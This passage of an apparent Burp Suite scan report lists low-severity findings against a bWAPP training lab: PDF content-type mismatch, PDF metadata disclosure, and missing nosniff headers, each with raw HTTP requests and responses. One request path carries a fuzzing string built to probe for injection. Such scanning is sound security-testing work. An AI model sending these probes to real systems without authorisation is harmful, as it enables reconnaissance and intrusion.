    _... .......$...........................................................................................................................................................................................
    ...[SNIP]...
    16.8. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Issue detail

    The response states that the content type is application/octet-stream. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11
    • Internet Explorer 11 (Compatibility Mode)
    • Edge

    Request 1

    GET /bWAPP/restrict_folder_access.php?file=documents/Iron_Man.pdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/restrict_folder_access.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: 0
    Cache-Control: must-revalidate
    Pragma: public
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=Iron_Man.pdf
    Content-Transfer-Encoding: binary
    Content-Length: 543803
    Connection: close
    Content-Type: application/octet-stream

    %PDF-1.4
    %....
    5 0 obj
    <</Length 6 0 R/Filter /FlateDecode>>
    stream
    x...{.n.U....>w<w.....H:.f.www.~I...`.F...g .+...W..Y.*.B*!..    .0..R.. .I.+..q.....I....D.e..T.'vHP%e..Y......o.1......4s.........u.
    ...[SNIP]...
    17. Metadata in PDF File(s)

    There are 6 instances of this issue:

    17.1. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102011943
    • Parameter: Title. Value: http://www.imdb.com/title/tt0371746/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102011943
    17.2. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012434
    • Parameter: Title. Value: http://www.imdb.com/title/tt0438488/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012434
    17.3. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012104
    • Parameter: Title. Value: http://www.imdb.com/title/tt0948470/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012104
    17.4. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012405
    • Parameter: Title. Value: http://www.imdb.com/title/tt1259521/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012405
    17.5. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012324
    • Parameter: Title. Value: http://www.imdb.com/title/tt1345836/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012324
    17.6. http://192.168.52.147/bWAPP/restrict_folder_access.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012159
    • Parameter: Title. Value: http://www.imdb.com/title/tt0800080/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012159
    18. Content Sniffing not disabled

    There are 191 instances of this issue:

    Issue description

    The response did not set the "X-Content-Type-Options" HTTP header with the value nosniff. Without this header, certain browsers try to determine the content type and encoding of the response themselves, even when these properties are defined correctly. This can make the web application vulnerable to Cross-Site Scripting (XSS) attacks. For example, Internet Explorer and Safari treat responses with the content type text/plain as HTML if they contain HTML tags.

    18.1. http://192.168.52.147/bWAPP/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Location: portal.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.2. http://192.168.52.147/bWAPP/666

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/666

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/666 HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce0be-70-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 112
    Connection: close
    Content-Type: text/plain

    Hi little bee, how are you today?

    Try to detect this evil 666 page through fuzzing...

    Have fun!

    Cheers, Malik
    18.3. http://192.168.52.147/bWAPP/admin/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3159
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.4. http://192.168.52.147/bWAPP/admin/index.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/index.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/index.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3159
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.5. http://192.168.52.147/bWAPP/admin/phpinfo.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/php_cgi.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53204

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:36 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 52584

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:40 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 53085
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:44 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 53161
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:57 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53237

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:38:02 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53313

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:08 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53389

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:47:50 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53345

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:46:35 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53307

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:28 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54213

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:36 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54125

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:50 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54037

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

    Summary

